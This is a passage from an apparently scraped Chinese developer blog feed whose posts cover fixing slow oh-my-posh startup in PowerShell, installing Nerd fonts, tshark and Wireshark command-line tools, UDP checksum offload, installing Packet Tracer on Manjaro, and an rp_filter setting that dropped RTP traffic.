netcat 1.","title":"windows 上的命令行体验"},{"content":"每次打开新的标签页,Powershell 都会输出下面的代码\nLoading personal and system profiles took 3566ms. 时间不固定,有时1s到10s都可能有,时间不固定。 这个加载速度是非常慢的。\n然后我打开一个非oh-my-posh的窗口,输入\noh-my-posh debug 看到其中几行日志:\n2022/07/09 12:20:23 error: HTTPRequest Get \u0026#34;https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json\u0026#34;: context deadline exceeded 2022/07/09 12:20:23 HTTPRequest duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 downloadConfig duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 resolveConfigPath duration: 5.0072715s, args: 2022/07/09 12:20:23 Init duration: 5.0072715s, args: 好家伙,原来每次启动,oh-my-posh还去github上下载了一个文件。\n因为下载文件而拖慢了整个启动过程。\n然后在github issue上倒找:https://github.com/JanDeDobbeleer/oh-my-posh/issues/2251\noh-my-posh init pwsh \u0026ndash;config ~/default.omp.json\n其中关键一点是启动oh-my-posh的时候,如果不用\u0026ndash;config配置默认的文件,oh-my-posh就回去下载默认的配置文件。\n所以问题就好解决了。\n首先下载https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 这个文件,然后再保存到用户的家目录里面。\n然后打开terminal, 输入: code $profile\n前提是你的电脑上要装过vscode, 然后给默认的profile加上\u0026ndash;config参数,试了一下,问题解决。\noh-my-posh init pwsh --config ~/default.omp.json | Invoke-Expression Import-Module PSReadLine New-Alias -Name ll -Value ls if ($host.Name -eq \u0026#39;ConsoleHost\u0026#39;) { Import-Module PSReadLine Set-PSReadLineOption -EditMode Emacs } ","permalink":"https://wdd.js.org/posts/2022/07/igur01/","summary":"每次打开新的标签页,Powershell 都会输出下面的代码\nLoading personal and system profiles took 3566ms. 时间不固定,有时1s到10s都可能有,时间不固定。 这个加载速度是非常慢的。\n然后我打开一个非oh-my-posh的窗口,输入\noh-my-posh debug 看到其中几行日志:\n2022/07/09 12:20:23 error: HTTPRequest Get \u0026#34;https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json\u0026#34;: context deadline exceeded 2022/07/09 12:20:23 HTTPRequest duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 downloadConfig duration: 5.0072715s, args: https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 2022/07/09 12:20:23 resolveConfigPath duration: 5.0072715s, args: 2022/07/09 12:20:23 Init duration: 5.0072715s, args: 好家伙,原来每次启动,oh-my-posh还去github上下载了一个文件。\n因为下载文件而拖慢了整个启动过程。\n然后在github issue上倒找:https://github.com/JanDeDobbeleer/oh-my-posh/issues/2251\noh-my-posh init pwsh \u0026ndash;config ~/default.omp.json\n其中关键一点是启动oh-my-posh的时候,如果不用\u0026ndash;config配置默认的文件,oh-my-posh就回去下载默认的配置文件。\n所以问题就好解决了。\n首先下载https://raw.githubusercontent.com/JanDeDobbeleer/oh-my-posh/v8.15.0/themes/default.omp.json 这个文件,然后再保存到用户的家目录里面。\n然后打开terminal, 输入: code $profile\n前提是你的电脑上要装过vscode, 然后给默认的profile加上\u0026ndash;config参数,试了一下,问题解决。\noh-my-posh init pwsh --config ~/default.","title":"powershell oh-my-posh 加载数据太慢"},{"content":"0. 前提条件 系统是windows11 已经安装过powershell 7 安装过vscode编辑器 默认情况下,所有命令均在powershell下执行的 1. 安装 oh my posh 1.2 方式1: 通过代理安装 假如你有socks代理,那么可以用winget安装\n打开你的power shell 执行类似下面的命令,来配置代理\n$env:all_proxy=\u0026#34;socks5://127.0.0.1:1081\u0026#34; 如果没有socks代理,最好不要用winget安装,因为速度太慢。然后执行:\nwinget install JanDeDobbeleer.OhMyPosh -s winget 1.2 方式2: 下载exe,手工安装 再oh-my-posh的release界面 https://github.com/JanDeDobbeleer/oh-my-posh/releases\n可以看到很多版本的文件,windows选择install-amd64.exe, 下载完了之后手工点击执行来安装。\nhttps://github.com/JanDeDobbeleer/oh-my-posh/releases/download/v8.13.1/install-amd64.exe\n2. 配置 oh-my-posh 在powershell中执行下面的命令,vscode回打开对应的文件。\ncode $PROFILE 在文件中粘贴如下的内容:\noh-my-posh init pwsh | Invoke-Expression 保存文件,然后再次打开windows termial, 输入下面的命令来reload profile\n. $PROFILE 然后你可以看到终端出现了提示符,有可能有点卡,第一次是有点慢的。但是很多符号可能是乱码,因为是没有配置相关的字体。\n3. 字体配置 3.1 安装字体 下载文件 https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip 解压文件 打开设置,在个性化》字体中,将之前下载好的所有字体,拖动到下面的红框中,字体就会自动安装 3.2 windows termial字体配置 用vscode打开对windows termial的配置json文件,在profiles.default.font中配置如下字体\n\u0026#34;font\u0026#34;: { \u0026#34;face\u0026#34;: \u0026#34;MesloLGM NF\u0026#34; } 配置之后,需要重启windows termial\n3.3 vscode termial 配置 在vscode中输入 Open Sett, 就可以打开设置的json文件。\n在配置中设置如下的内容\n\u0026#34;terminal.integrated.fontFamily\u0026#34;: \u0026#34;MesloLGM NF\u0026#34;, 4. 效果展示 4.1 windows terminal 4.2 vscode terminal 5. 体验 优点 oh-my-posh 总体还不错,能够方便的展示git相关的信息 缺点 性能拉跨,每次终端可能需要0.5s到2s之间的延迟卡顿,相比于linux上的shell要慢不少 6. 参考文献 https://ohmyposh.dev/docs/installation/prompt ","permalink":"https://wdd.js.org/posts/2022/07/ssgb9f/","summary":"0. 前提条件 系统是windows11 已经安装过powershell 7 安装过vscode编辑器 默认情况下,所有命令均在powershell下执行的 1. 安装 oh my posh 1.2 方式1: 通过代理安装 假如你有socks代理,那么可以用winget安装\n打开你的power shell 执行类似下面的命令,来配置代理\n$env:all_proxy=\u0026#34;socks5://127.0.0.1:1081\u0026#34; 如果没有socks代理,最好不要用winget安装,因为速度太慢。然后执行:\nwinget install JanDeDobbeleer.OhMyPosh -s winget 1.2 方式2: 下载exe,手工安装 再oh-my-posh的release界面 https://github.com/JanDeDobbeleer/oh-my-posh/releases\n可以看到很多版本的文件,windows选择install-amd64.exe, 下载完了之后手工点击执行来安装。\nhttps://github.com/JanDeDobbeleer/oh-my-posh/releases/download/v8.13.1/install-amd64.exe\n2. 配置 oh-my-posh 在powershell中执行下面的命令,vscode回打开对应的文件。\ncode $PROFILE 在文件中粘贴如下的内容:\noh-my-posh init pwsh | Invoke-Expression 保存文件,然后再次打开windows termial, 输入下面的命令来reload profile\n. $PROFILE 然后你可以看到终端出现了提示符,有可能有点卡,第一次是有点慢的。但是很多符号可能是乱码,因为是没有配置相关的字体。\n3. 字体配置 3.1 安装字体 下载文件 https://github.com/ryanoasis/nerd-fonts/releases/download/v2.1.0/Meslo.zip 解压文件 打开设置,在个性化》字体中,将之前下载好的所有字体,拖动到下面的红框中,字体就会自动安装 3.2 windows termial字体配置 用vscode打开对windows termial的配置json文件,在profiles.default.font中配置如下字体\n\u0026#34;font\u0026#34;: { \u0026#34;face\u0026#34;: \u0026#34;MesloLGM NF\u0026#34; } 配置之后,需要重启windows termial","title":"windows11 安装 oh my posh"},{"content":"自从我换了新款的惠普战X之后,我的老搭档,2017款的macbook pro, 已经在沙发上躺了很久了。\n我拍了拍它的脑袋,对它语重心长的说: 人不能闲着,闲着容易生病,笔记本也是如此。虽然你已经是5年前的mbp了, 但是廉颇老矣,尚能饭否?\nmbp面无表情,胡子邋遢,朝我瞥了一眼,像是嘲讽,又像是不满,一口气吸掉还剩一点的香烟,有气无力的说:我已经工作五年了,按照国家的法律规定,已经到了退休的年龄,是该享受享受了。\n我\n","permalink":"https://wdd.js.org/posts/2022/07/guv65u/","summary":"自从我换了新款的惠普战X之后,我的老搭档,2017款的macbook pro, 已经在沙发上躺了很久了。\n我拍了拍它的脑袋,对它语重心长的说: 人不能闲着,闲着容易生病,笔记本也是如此。虽然你已经是5年前的mbp了, 但是廉颇老矣,尚能饭否?\nmbp面无表情,胡子邋遢,朝我瞥了一眼,像是嘲讽,又像是不满,一口气吸掉还剩一点的香烟,有气无力的说:我已经工作五年了,按照国家的法律规定,已经到了退休的年龄,是该享受享受了。\n我","title":"关于我在闲鱼卖二手这件事"},{"content":"我最早用过有道,我觉得有道很烂。\n后来我开始用印象笔记,我发现印象笔记更烂。不仅界面做的让人觉得侮辱眼睛,即使你开了会员也要看广告。 印象笔记会员被割了韭菜,充到了2026年,但是我最近一两年我基本没有用过印象笔记。\n后来我遇到了文档blog界的new school, notion、语雀、飞书, 就完全抛弃了有道和印象笔记的old school。\n做任何事情,都需要动机。\n写公开博客也是如此。可能有以下原因\n提升个人影响力 提高自己的表达能力 知识积累和分享 公开博客需要三方角力,平台方、内容生产者、内容消费者(读者)。\n作为内容生产者,我们从选择一个平台是需要很多理由的。可能是UI界面的颜值,可能是一见钟情界面交互。\n就像男女的相亲,首先要被外貌吸引,才能有下文。\n然而除了那一见钟情的必然是短暂的,除此之外,我发现了另一个重要原因:迁移成本\n我以前决定不用印象的时候,印象笔记上还有我将近一千多篇的笔记。虽说印象笔记有导出工具,但是只有当你用的时候,你才能体会导出工具是多坑爹。\n假如你一天决定不用这个平台了,你想把所有你产出的内容都迁移出来,你要花费多少成本呢? 很多人都没有考虑过这件事情。\n就像温水煮青蛙,只有感觉到烫的时候,青蛙才会准备跳走,但是青蛙还能跳出去吗? 可能他的腿都已经煮熟了吧?\n从另外一个方面来说,作为内容生产者,我们要花时间,花精力来写文章,还要花金钱来买平台的会员,然而平台对内容生产者来说,有什么回报呢?\n我们只不过是为他人做嫁衣罢了。就像旧时代的长工,只不过在一个大一点的地主家干活了吧。\n再见了,语雀。\n新的bolg地址: wdd.js.org\n我以前没得选,我现在想选择做个自由人\n","permalink":"https://wdd.js.org/posts/2022/06/fk9rgk/","summary":"我最早用过有道,我觉得有道很烂。\n后来我开始用印象笔记,我发现印象笔记更烂。不仅界面做的让人觉得侮辱眼睛,即使你开了会员也要看广告。 印象笔记会员被割了韭菜,充到了2026年,但是我最近一两年我基本没有用过印象笔记。\n后来我遇到了文档blog界的new school, notion、语雀、飞书, 就完全抛弃了有道和印象笔记的old school。\n做任何事情,都需要动机。\n写公开博客也是如此。可能有以下原因\n提升个人影响力 提高自己的表达能力 知识积累和分享 公开博客需要三方角力,平台方、内容生产者、内容消费者(读者)。\n作为内容生产者,我们从选择一个平台是需要很多理由的。可能是UI界面的颜值,可能是一见钟情界面交互。\n就像男女的相亲,首先要被外貌吸引,才能有下文。\n然而除了那一见钟情的必然是短暂的,除此之外,我发现了另一个重要原因:迁移成本\n我以前决定不用印象的时候,印象笔记上还有我将近一千多篇的笔记。虽说印象笔记有导出工具,但是只有当你用的时候,你才能体会导出工具是多坑爹。\n假如你一天决定不用这个平台了,你想把所有你产出的内容都迁移出来,你要花费多少成本呢? 很多人都没有考虑过这件事情。\n就像温水煮青蛙,只有感觉到烫的时候,青蛙才会准备跳走,但是青蛙还能跳出去吗? 可能他的腿都已经煮熟了吧?\n从另外一个方面来说,作为内容生产者,我们要花时间,花精力来写文章,还要花金钱来买平台的会员,然而平台对内容生产者来说,有什么回报呢?\n我们只不过是为他人做嫁衣罢了。就像旧时代的长工,只不过在一个大一点的地主家干活了吧。\n再见了,语雀。\n新的bolg地址: wdd.js.org\n我以前没得选,我现在想选择做个自由人","title":"最后一篇blog, 是时候说再见了"},{"content":"1. 使用摘要 一个命令的使用摘要非常重要,摘要里包含了这个工具最常用的用法。\n要注意的是,如果要用过滤器,一定要放到最后。\ntshark [ -i \u0026lt;capture interface\u0026gt;|- ] [ -f \u0026lt;capture filter\u0026gt; ] [ -2 ] [ -r \u0026lt;infile\u0026gt; ] [ -w \u0026lt;outfile\u0026gt;|- ] [ options ] [ \u0026lt;filter\u0026gt; ] tshark -G [ \u0026lt;report type\u0026gt; ] [ --elastic-mapping-filter \u0026lt;protocols\u0026gt; ] 2. 为什么要学习tshark? 一般情况下,我们可能会在服务端用tcpdump抓包,然后把包拿下来,用wireshark分析。那么我们为什么要学习tshark呢?\n相比于wireshark, tshark有以下的优点\n速度飞快:wireshark在加载包的时候,tshark可能已经给出了结果。 更稳定:wireshark在处理包的时候,常常容易崩溃 更适合做文本处理:tshark的输出是文本,这个文本很容易被awk, sort, uniq等等命令处理 但是我不建议上来就学习,更建议在熟悉wireshark之后,再去进一步学习tshark\n3. 使用场景 3.1 基本场景 用wireshark最基本的场景的把pcap文件拖动到wireshark中,然后可能加入一些过滤条件。\ntshark -r demo.pcap tshark -r demo.pcap -c 1 # 只读一个包就停止 输出的列分别为:序号,相对时间,绝对时间,源ip, 源端口,目标ip, 目标端口\n3.2 按照表格输出 tshark -r demo.pcap -T tabs 3.3 按照指定的列输出 例如,抓的的sip的包,我们只想输出sip的user-agent字段。\ntshark -r demo.pcap -Tfields -e sip.User-Agent sip and sip.Method==REGISTER 按照上面的输出,我们可以用简单的sort和seq就可以把所有的设备类型打印出来。\n3.4 过滤之后写入文件 比如一个很大的pcap文件,我们可以用tshark过滤之后,写入一个新的文件。\n例如下面的,我们使用过滤器sip and sip.Method==REGISTER, 然后把过滤后的包写入到register.pcap\n● -Y \u0026ldquo;sip and frame.cap_len \u0026gt; 1300\u0026rdquo; 查看比较大的SIP包 tshark -r demo.pcap -w register.pcap sip and sip.Method==REGISTER\n3.4 统计分析 tshark支持统计分析,例如统计rtp 丢包率。\ntshark -r demo.pcap -qn -z rtp,streams -z参数是用来各种统计分析的,具体支持的统计类型,可以用\ntshark -z help ➜ Desktop tshark -z help afp,srt ancp,tree ansi_a,bsmap ansi_a,dtap ansi_map asap,stat bacapp_instanceid,tree bacapp_ip,tree bacapp_objectid,tree bacapp_service,tree calcappprotocol,stat camel,counter camel,srt collectd,tree componentstatusprotocol,stat conv,bluetooth conv,dccp conv,eth conv,fc 参考 https://www.wireshark.org/docs/man-pages/tshark.html ","permalink":"https://wdd.js.org/network/tshark/","summary":"1. 使用摘要 一个命令的使用摘要非常重要,摘要里包含了这个工具最常用的用法。\n要注意的是,如果要用过滤器,一定要放到最后。\ntshark [ -i \u0026lt;capture interface\u0026gt;|- ] [ -f \u0026lt;capture filter\u0026gt; ] [ -2 ] [ -r \u0026lt;infile\u0026gt; ] [ -w \u0026lt;outfile\u0026gt;|- ] [ options ] [ \u0026lt;filter\u0026gt; ] tshark -G [ \u0026lt;report type\u0026gt; ] [ --elastic-mapping-filter \u0026lt;protocols\u0026gt; ] 2. 为什么要学习tshark? 一般情况下,我们可能会在服务端用tcpdump抓包,然后把包拿下来,用wireshark分析。那么我们为什么要学习tshark呢?\n相比于wireshark, tshark有以下的优点\n速度飞快:wireshark在加载包的时候,tshark可能已经给出了结果。 更稳定:wireshark在处理包的时候,常常容易崩溃 更适合做文本处理:tshark的输出是文本,这个文本很容易被awk, sort, uniq等等命令处理 但是我不建议上来就学习,更建议在熟悉wireshark之后,再去进一步学习tshark\n3. 使用场景 3.1 基本场景 用wireshark最基本的场景的把pcap文件拖动到wireshark中,然后可能加入一些过滤条件。\ntshark -r demo.pcap tshark -r demo.pcap -c 1 # 只读一个包就停止 输出的列分别为:序号,相对时间,绝对时间,源ip, 源端口,目标ip, 目标端口","title":"Tshark入门到精通"},{"content":"在服务端抓包,然后在wireshark上分析,发现wireshark提示:udp checksum字段有问题\nchecksum 0x\u0026hellip; incrorect should be 0x.. (maybe caused by udp checksum offload)\n以前我从未遇到过udp checksum的问题。所以这次是第一次遇到,所以需要学习一下。 首先udp checksum是什么?\n我们看下udp的协议组成的字段,其中就有16位的校验和\n校验和一般都是为了检验数据包在传输过程中是否出现变动的。\n如果接受端收到的udp消息校验和错误,将会被悄悄的丢弃 udp校验和是一个端到端的校验和。端到端意味它不会在中间网络设备上校验。 校验和由发送方负责计算,接收端负责验证。目的是为了发现udp首部和和数据在发送端和接受端之间是否发生了变动 udp校验和是可选的功能,但是总是应该被默认启用。 如果发送方设置了udp校验和,则接受方必须验证 发送方负责计算?具体是谁负责计算\n计算一般都是CPU的工作,但是有些网卡也是支持checksum offload的。\n所谓offload, 是指本来可以由cpu计算的,改变由网卡硬件负责计算。 这样做有很多好处,\n可以降低cpu的负载,提高系统的性能 网卡的硬件checksum, 效率更高 为什么只有发送方出现udp checksum 错误? 我在接受方和放松方都进行了抓包,一个比较特殊的特征是,只有发送方发现了udp checksum的错误,在接受方,同样的包,udp checksum的值却是正确的。\n一句话的解释:tcpdump在接收方抓到的包,本身checksum字段还没有被计算,在后续的步骤,这个包才会被交给NIC, NIC来负责计算。\n结论 maybe caused by udp checksum offload 这个报错并没有什么问题。\n参考 ● 《tcp/ip 详解》 ● https://www.kernel.org/doc/html/latest/networking/checksum-offloads.html ● https://dominikrys.com/posts/disable-udp-checksum-validation/ ● https://sokratisg.net/2012/04/01/udp-tcp-checksum-errors-from-tcpdump-nic-hardware-offloading/\n","permalink":"https://wdd.js.org/network/udp-checksum-offload/","summary":"在服务端抓包,然后在wireshark上分析,发现wireshark提示:udp checksum字段有问题\nchecksum 0x\u0026hellip; incrorect should be 0x.. (maybe caused by udp checksum offload)\n以前我从未遇到过udp checksum的问题。所以这次是第一次遇到,所以需要学习一下。 首先udp checksum是什么?\n我们看下udp的协议组成的字段,其中就有16位的校验和\n校验和一般都是为了检验数据包在传输过程中是否出现变动的。\n如果接受端收到的udp消息校验和错误,将会被悄悄的丢弃 udp校验和是一个端到端的校验和。端到端意味它不会在中间网络设备上校验。 校验和由发送方负责计算,接收端负责验证。目的是为了发现udp首部和和数据在发送端和接受端之间是否发生了变动 udp校验和是可选的功能,但是总是应该被默认启用。 如果发送方设置了udp校验和,则接受方必须验证 发送方负责计算?具体是谁负责计算\n计算一般都是CPU的工作,但是有些网卡也是支持checksum offload的。\n所谓offload, 是指本来可以由cpu计算的,改变由网卡硬件负责计算。 这样做有很多好处,\n可以降低cpu的负载,提高系统的性能 网卡的硬件checksum, 效率更高 为什么只有发送方出现udp checksum 错误? 我在接受方和放松方都进行了抓包,一个比较特殊的特征是,只有发送方发现了udp checksum的错误,在接受方,同样的包,udp checksum的值却是正确的。\n一句话的解释:tcpdump在接收方抓到的包,本身checksum字段还没有被计算,在后续的步骤,这个包才会被交给NIC, NIC来负责计算。\n结论 maybe caused by udp checksum offload 这个报错并没有什么问题。\n参考 ● 《tcp/ip 详解》 ● https://www.kernel.org/doc/html/latest/networking/checksum-offloads.html ● https://dominikrys.com/posts/disable-udp-checksum-validation/ ● https://sokratisg.net/2012/04/01/udp-tcp-checksum-errors-from-tcpdump-nic-hardware-offloading/","title":"Udp Checksum Offload"},{"content":"大多数时候我们都是图形界面的方式使用wireshak, 其实一般只要你安装了wireshark,同时也附带安装了一些命令行工具。 这些工具也可以极大的提高生产效率。 本文只是对工具的功能简介,可以使用命令 -h, 查看命令的具体使用文档。\n1. editcap 编辑抓包文件 Editcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Edit and/or translate the format of capture files. 举例: 按照时间范围从input.pcap文件中拿出指定时间范围的包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 2. androiddump 这个命令似乎可以用来对安卓系统进行抓包,没玩过安卓,不再多说。\nWireshark - androiddump v1.1.0 Usage: androiddump --extcap-interfaces [--adb-server-ip=\u0026lt;arg\u0026gt;] [--adb-server-tcp-port=\u0026lt;arg\u0026gt;] androiddump --extcap-interface=INTERFACE --extcap-dlts androiddump --extcap-interface=INTERFACE --extcap-config androiddump --extcap-interface=INTERFACE --fifo=PATH_FILENAME --capture 3. ciscodump 似乎是对思科的网络进行抓包的,没用过 Wireshark - ciscodump v1.0.0 Usage: ciscodump \u0026ndash;extcap-interfaces ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-dlts ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-config ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface gigabit0/0 \u0026ndash;fifo=FILENAME \u0026ndash;capture\n4. randpktdump 这个似乎也是一个网络抓包的 Wireshark - randpktdump v0.1.0 Usage: randpktdump \u0026ndash;extcap-interfaces randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;extcap-dlts randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;extcap-config randpktdump \u0026ndash;extcap-interface=randpkt \u0026ndash;type dns \u0026ndash;count 10 \u0026ndash;fifo=FILENAME \u0026ndash;capture\n5. sshdump 这个应该是对ssh进行抓包的 Wireshark - sshdump v1.0.0 Usage: sshdump \u0026ndash;extcap-interfaces sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;extcap-dlts sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;extcap-config sshdump \u0026ndash;extcap-interface=sshdump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface eth2 \u0026ndash;remote-capture-command \u0026rsquo;tcpdump -U -i eth0 -w -\u0026rsquo; \u0026ndash;fifo=FILENAME \u0026ndash;capture\n6. idl2wrs 7. mergecap 合并多个抓包文件 mergecap -w output.pcap input1.pcap input2.pcap input3.pcap\n8. mmdbresolve 9. randpkt 10. rawshark 11. reordercap Reordercap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Reorder timestamps of input file frames into output file. See https://www.wireshark.org for more information. Usage: reordercap [options] Options: -n don\u0026rsquo;t write to output file if the input file is ordered. -h display this help and exit. -v print version information and exit.\n12. sharkd Usage: sharkd [\u0026lt;classic_options\u0026gt;|\u0026lt;gold_options\u0026gt;] Classic (classic_options): [-|] examples:\nunix:/tmp/sharkd.sock - listen on unix file /tmp/sharkd.sock Gold (gold_options): -a , \u0026ndash;api listen on this socket -h, \u0026ndash;help show this help information -v, \u0026ndash;version show version information -C , \u0026ndash;config-profile start with specified configuration profile Examples: sharkd -C myprofile sharkd -a tcp:127.0.0.1:4446 -C myprofile See the sharkd page of the Wireshark wiki for full details. 13. text2pcap Text2pcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Generate a capture file from an ASCII hexdump of packets. See https://www.wireshark.org for more information. Usage: text2pcap [options] where specifies input filename (use - for standard input) specifies output filename (use - for standard output)\n14. tshark 命令行版本的wireshark, 用的最多的 TShark (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Dump and analyze network traffic. See https://www.wireshark.org for more information.\n15. udpdump Wireshark - udpdump v0.1.0 Usage: udpdump \u0026ndash;extcap-interfaces udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;extcap-dlts udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;extcap-config udpdump \u0026ndash;extcap-interface=udpdump \u0026ndash;port 5555 \u0026ndash;fifo myfifo \u0026ndash;capture Options: \u0026ndash;extcap-interfaces: list the extcap Interfaces \u0026ndash;extcap-dlts: list the DLTs \u0026ndash;extcap-interface : specify the extcap interface \u0026ndash;extcap-config: list the additional configuration for an interface \u0026ndash;capture: run the capture \u0026ndash;extcap-capture-filter : the capture filter \u0026ndash;fifo : dump data to file or fifo \u0026ndash;extcap-version: print tool version \u0026ndash;debug: print additional messages \u0026ndash;debug-file: print debug messages to file \u0026ndash;help: print this help \u0026ndash;version: print the version \u0026ndash;port : the port to listens on. Default: 5555\n16. capinfos 打印出包的各种信息 Capinfos (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Print various information (infos) about capture files. See https://www.wireshark.org for more information. Usage: capinfos [options] \u0026hellip; General infos: -t display the capture file type -E display the capture file encapsulation -I display the capture file interface information -F display additional capture file information -H display the SHA256, RIPEMD160, and SHA1 hashes of the file -k display the capture comment\n17. captype Captype (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Print the file types of capture files.\n18. dftest ➜ ~ dftest \u0026ndash;help\nFilter: \u0026ndash;help\n19. dumpcap See https://www.wireshark.org for more information.\n","permalink":"https://wdd.js.org/network/wireshark-extra-cli/","summary":"大多数时候我们都是图形界面的方式使用wireshak, 其实一般只要你安装了wireshark,同时也附带安装了一些命令行工具。 这些工具也可以极大的提高生产效率。 本文只是对工具的功能简介,可以使用命令 -h, 查看命令的具体使用文档。\n1. editcap 编辑抓包文件 Editcap (Wireshark) 3.6.1 (v3.6.1-0-ga0a473c7c1ba) Edit and/or translate the format of capture files. 举例: 按照时间范围从input.pcap文件中拿出指定时间范围的包\neditcap -A \u0026#39;2014-12-10 10:11:01\u0026#39; -B \u0026#39;2014-12-10 10:21:01\u0026#39; input.pcap output.pcap 2. androiddump 这个命令似乎可以用来对安卓系统进行抓包,没玩过安卓,不再多说。\nWireshark - androiddump v1.1.0 Usage: androiddump --extcap-interfaces [--adb-server-ip=\u0026lt;arg\u0026gt;] [--adb-server-tcp-port=\u0026lt;arg\u0026gt;] androiddump --extcap-interface=INTERFACE --extcap-dlts androiddump --extcap-interface=INTERFACE --extcap-config androiddump --extcap-interface=INTERFACE --fifo=PATH_FILENAME --capture 3. ciscodump 似乎是对思科的网络进行抓包的,没用过 Wireshark - ciscodump v1.0.0 Usage: ciscodump \u0026ndash;extcap-interfaces ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-dlts ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;extcap-config ciscodump \u0026ndash;extcap-interface=ciscodump \u0026ndash;remote-host myhost \u0026ndash;remote-port 22222 \u0026ndash;remote-username myuser \u0026ndash;remote-interface gigabit0/0 \u0026ndash;fifo=FILENAME \u0026ndash;capture","title":"Wireshark 附带的19命令行程序"},{"content":"环境 kernal Linux 5.15.48-1-MANJARO #1 SMP PREEMPT Thu Jun 16 12:33:56 UTC 2022 x86_64 GNU/Linux docker 20.10.16 初始内存 total used free shared buff/cache available 内存: 30Gi 1.9Gi 19Gi 2.0Mi 9.6Gi 28Gi 交换: 0B 0B 0B 初始配置 sysctl -n vm.min_free_kbytes 67584 sysctl -n vm.vfs_cache_pressure 200 vfs_cache_pressure的对内存的影响 vfs_cache_pressure设置为200, 理论系统倾向于回收内存\n","permalink":"https://wdd.js.org/posts/2022/06/eafeid/","summary":"环境 kernal Linux 5.15.48-1-MANJARO #1 SMP PREEMPT Thu Jun 16 12:33:56 UTC 2022 x86_64 GNU/Linux docker 20.10.16 初始内存 total used free shared buff/cache available 内存: 30Gi 1.9Gi 19Gi 2.0Mi 9.6Gi 28Gi 交换: 0B 0B 0B 初始配置 sysctl -n vm.min_free_kbytes 67584 sysctl -n vm.vfs_cache_pressure 200 vfs_cache_pressure的对内存的影响 vfs_cache_pressure设置为200, 理论系统倾向于回收内存","title":"vfs_cache_pressure和min_free_kbytes对cache的影响"},{"content":"# 将会下载packettracer到当前目录下 yay -G packettracer cd packettracer # Download PacketTracer_731_amd64.deb to this folder makepkg sudo pacman -U packettracer-7.3.1-2-x86_64.pkg.tar.xz 注意,如果下载的packetraacer包不是PacketTracer_731_amd64.deb, 则需要修改PKGBUILD文件中的, souce对应的文件名。 例如我下载的packettracer是Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\nsource=(\u0026#39;local://Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\u0026#39; \u0026#39;packettracer.sh\u0026#39;) 注意:最新版的packertracer打开后,必须登陆账号才能使用,有点坑。 花费点时间注册了账号后,才能用。\n参考 https://forum.manjaro.org/t/how-to-get-cisco-packet-tracer-on-manjaro/25506/5 ","permalink":"https://wdd.js.org/posts/2022/06/manjaro-packettracer/","summary":"# 将会下载packettracer到当前目录下 yay -G packettracer cd packettracer # Download PacketTracer_731_amd64.deb to this folder makepkg sudo pacman -U packettracer-7.3.1-2-x86_64.pkg.tar.xz 注意,如果下载的packetraacer包不是PacketTracer_731_amd64.deb, 则需要修改PKGBUILD文件中的, souce对应的文件名。 例如我下载的packettracer是Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\nsource=(\u0026#39;local://Cisco_Packet_Tracer_811_Ubuntu_64bit_cf200f5851.deb\u0026#39; \u0026#39;packettracer.sh\u0026#39;) 注意:最新版的packertracer打开后,必须登陆账号才能使用,有点坑。 花费点时间注册了账号后,才能用。\n参考 https://forum.manjaro.org/t/how-to-get-cisco-packet-tracer-on-manjaro/25506/5 ","title":"manjaro 安装 packettracer"},{"content":"问题现象 主机上有两个网卡ens192和ens224。ens129网卡是对内网络的网卡,ens224是对网网络的网卡。\nSIP信令阶段都是正常的,但是发现,对于来自node3的RTP流, 并没有从ens192网卡转发给node1上。\nsequenceDiagram title network autonumber node1-\u003e\u003eens192: INVITE ens224-\u003e\u003enode2: INVITE node2-\u003e\u003eens224: 200 ok ens192-\u003e\u003enode1: 200 ok node1-\u003e\u003eens192: ACK ens224-\u003e\u003enode2: ACK node1--\u003e\u003eens192: RTP out ens224--\u003e\u003enode3: RTP out node3--\u003e\u003eens224: RTP in 抓包程序抓到了node3发送到ens224上的包,但是排查应用服务器的日志发现,似乎应用服务器根本没有收到node3上过来的包, 所以也就无法转发。\n因而怀疑是不是在内核上被拦截了。 后来通过将rp_filter设置为0, 然后语音流的转发就正常了。\n事后复盘 node3的这个IP直接往应用服务器上发包,可能会被拦截。因为在信令建立的阶段,应用服务器并没有主动发\n在kernel文档上 rp_filter - INTEGER 0 - No source validation. 1 - Strict mode as defined in RFC3704 Strict Reverse Path Each incoming packet is tested against the FIB and if 